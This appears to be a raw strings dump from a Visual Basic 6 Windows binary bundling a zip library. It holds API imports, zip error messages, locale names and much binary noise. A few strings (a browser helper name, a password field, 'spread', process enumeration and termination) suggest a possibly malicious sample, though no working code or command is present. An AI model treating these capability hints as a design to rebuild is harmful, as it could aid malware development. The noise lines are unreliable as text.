ppxxxx
;`<p<Q=f=
PQhdY@
PQhxT@
pr china
pr-china
Privileges
Process32First
Process32Next
Program: 
<program name unknown>
Progress
Ps0jPs
Ps2uQs
PsC;Ks
PsDROsk
PsfzPs
PstjPs
Ps>UPs
puerto-rico
- pure virtual function call
pwwwww
pwwwwwx
=.=<=Q=
>Q?^?h?p?z?
Qkkbal
qPs_]Qs
qqqqqqqq
QQSUVWj
QQSVW3
QQSVWj
Qs@9Rs
Qs*aQs
Qs&nPsI
Qs];Os~
QstjPs
QswUPs'kPs7
`.rdata
ReadFile
Recurse -r
Recurse -R
RecurseSubDirs
RegCloseKey
RegCreateKeyA
RegDeleteKeyA
RegDeleteValueA
registry
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseMutex
@.reloc
remember to use binary mode when you transferred it?)
RemoveDirectoryA
Repair
 replace: can't open %s
Retry with option -qF to truncate, with -FF to attempt full recovery
RPhdY@
RPhxq@
RRPQj	
Rs|sQs%
:Rs\TPs
RtlMoveMemory
RtlUnwind
runtime error 
Runtime Error!
%s: adjusting offsets for a preamble of %lu bytes
Saturday
sBasePath
sBrowserHelperWWW
SeBackupPrivilege
 second full name: 
September
SeSecurityPrivilege
SetCurrentDirectoryA
SetEndOfFile
SetEnvironmentVariableA
SetFileAttributesA
SetFilePointer
SetFileTime
SetHandleCount
SetLastError
SetStdHandle
SetWindowLongA
sFilename
SHDocVw
shell32.dll
ShellExecuteA
ShowWindow
SING error
 s=%ld, actual=%ld 
SleepEx
slovak
south africa
south-africa
South Africa
south korea
south-korea
Spanish
spanish-argentina
spanish-bolivia
spanish-chile
spanish-colombia
spanish-costa rica
spanish-dominican republic
spanish-ecuador
spanish-el salvador
spanish-guatemala
spanish-honduras
spanish-mexican
spanish-modern
Spanish - Modern Sort
spanish-nicaragua
spanish-panama
spanish-paraguay
spanish-peru
spanish-puerto rico
Spanish - Traditional Sort
spanish-uruguay
spanish-venezuela
sPassword
specify just one action
spread
=sRIObjectWithSite
%s: %s a preamble of %lu bytes
SS@SSPVSS
starts on disk %u: 
stdole2.tlbWWW
 (stored 0%%)
StoreDirectories
StoreFolderNames
StoreVolumeLabel
strPath
Sunday
SunMonTueWedThuFriSat
S?uTOuU_uVouW
SUVWhX
Sweden
Swedish
swedish-finland
Switzerland
\$$SWV
System
SystemTimeToFileTime
t$0Fj/V
<:t0<;t,
target buffer too small
TargetFrameName
>T>b>v>
tEj@Vh
Temp dir switch command
Temporary directory
Temporary file failure
TerminateProcess
Text10
<]t_G<-uA
!This program cannot be run in DOS mode.
!This progrVB5!
Thursday
Timer1
Timer2
Timer3
Timer4
</tK<:tG<\tC
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
total bytes=%lu, compressed=%lu -> %d%% savings
T$ QPRW
T$$QRW
tried to write binary zipfile data to console!
trinidad & tobago
T$<RUV
t$ SRV
t#SSUP
<?t#<*t
t.;t$$t(
</t~<\tz
Tuesday
TUW}H@
t$$VSS
t$ WVjP
t/WWUPj
$ < u	
>:u#FV
uL9|$$t
Unable to allocate memory in zip dll
Unable to allocate memory in zip library at %s
- unable to initialize heap
- unable to open console device
undefined bits used in flags = 0x%04x: 
Unexpected end of zip file
unexpected error on zip file
- unexpected heap error
- unexpected multithread lock error
>:uNFV
united-kingdom
united-states
unknown compression method %u: 
unknown internal attributes = 0x%04x: 
Update
UpdateOnlyIfNewer
updating: %s
up to date
uRs_]Qs
Uruguay
use -b before zip file name
use -P before zip file name
user32
user32.dll
USER32.dll
User terminated operation
use -x or -i after name of zipfile
***;uuu
VBA6.DLL
__vbaAptOffset
__vbaAryConstruct2
__vbaAryCopy
__vbaAryDestruct
__vbaAryLock
__vbaAryMove
__vbaAryUnlock
__vbaAryVar
__vbaBoolVarNull
__vbaCastObj
__vbaChkstk
__vbaCopyBytes
__vbaEnd
__vbaErase
__vbaErrorOverflow
__vbaExceptHandler
__vbaExitProc
__vbaFailedFriend
__vbaFileClose
__vbaFileOpen
__vbaFixstrConstruct
__vbaFPException
__vbaFpI4
__vbaFPInt
__vbaFreeObj
__vbaFreeObjList
__vbaFreeStr
__vbaFreeStrList
__vbaFreeVar
__vbaFreeVarList
__vbaGenerateBoundsError
__vbaGet3
__vbaGosub
__vbaGosubFree
__vbaGosubReturn
__vbaHresultCheckObj
__vbaI2Abs
__vbaI2I4
__vbaI2Var
__vbaI4Var
__vbaInStr
__vbaInStrB
__vbaInStrVar
__vbaLateMemCall
__vbaLbound
__vbaLenBstr
__vbaLenBstrB
__vbaLineInputStr
__vbaLineInputVar
__vbaLsetFixstr
__vbaMidStmtBstr
__vbaNew
__vbaNew2
__vbaObjIs
__vbaObjSet
__vbaObjSetAddref
__vbaObjVar
__vbaOnError
__vbaPrintFile
__vbaPut3
__vbaPut4
__vbaPutOwner3
__vbaR8Var
__vbaRaiseEvent
__vbaRecAnsiToUni
__vbaRecDestruct
__vbaRecDestructAnsi
__vbaRecUniToAnsi
__vbaRedim
__vbaRedimPreserve
__vbaRefVarAry
__vbaSetSystemError
__vbaStrCat
__vbaStrCmp
__vbaStrCopy
__vbaStrFixstr
__vbaStrI2
__vbaStrI4
__vbaStrMove
__vbaStrToAnsi
__vbaStrToUnicode
__vbaStrVarCopy
__vbaStrVarMove
__vbaStrVarVal
__vbaUbound
__vbaUI1I2
__vbaUI1Str
__vbaVar2Vec
__vbaVarAdd
__vbaVarCat
__vbaVarCmpEq
__vbaVarCopy
__vbaVarDup
__vbaVargVarCopy
__vbaVargVarMove
__vbaVarIndexLoad
__vbaVarLateMemCallLd
__vbaVarLateMemSt
__vbaVarMove
__vbaVarOr
__vbaVarSetObj
__vbaVarSetVar
__vbaVarTstEq
__vbaVarTstGt
__vbaVarVargNofree
__vbaVarZero
VBShellLib
Vbshell.tlbWWW
vBWSSSj
vbzip11.dll
VC20XC00U
Venezuela
Verbose
Verdana
Verify password: 
VirtualAlloc
VirtualFree
Volume
Vtvj0j
VXw[Q/
WaitForSingleObject
was adding files to zip file
was copying %s
was creating pattern list
was deleting moved files and directories
was getting encryption password
was processing arguments
was processing list of files
was reading comment lines
was replacing the original zip file
was setting comments to null
was verifying encryption password
was zipping %s
Wednesday
WideCharToMultiByte
will just copy entry over: 
wininet
wininet.dll
wiz.exe
would be
WQj1Pj
write error on zip file
WriteFile
WritePrivateProfileStringA
;);W;s;
WSPVQR
wvsprintfA
wwwwww
wwwwwwp
wwwwwww
wwwwwwww
wwwwwwwww
wwwwwwwwwwp
wwwwwwwwwwww
wwwwwwwwwwwwww
wwwwwwx
wwwwwxp
wwwxxw
_^][YY
:	;Z;e;
zero-length name for entry #
zero length password not allowed
zip -0 not supported for I/O on pipes or devices
ZIP32.dll
zip diagnostic: deleting file %s
zip diagnostic: GetFileAttributes failed
zip diagnostic: GetVolumeInformation failed
zip diagnostic: %scluding %s
zip diagnostic: %s %s
zip error: %s (%s)
ZipFile
zip file empty
zip file has only directories, can't make it as old as latest entry
Zip file invalid or could not spawn unzip
zip file is empty, can't make it as old as latest entry
Zip file name
Zip file structure invalid
zip info: %s has %ld bytes of %sextra data
	zip info: %s%s
zip I/O error
zip: reading %s
zip warning
	zip warning: %s%s
zip warning: %s %s truncated.
ziXXXXXX
Zombie_GetTypeInfo
Zombie_GetTypeInfoCount
ZpArchive
ZpGetOptions
ZpInit
ZpSetOptions
ZpVersion
zu^SSS
ZVlE)m
.Z:.zip:.zoo:.arc:.lzh:.arj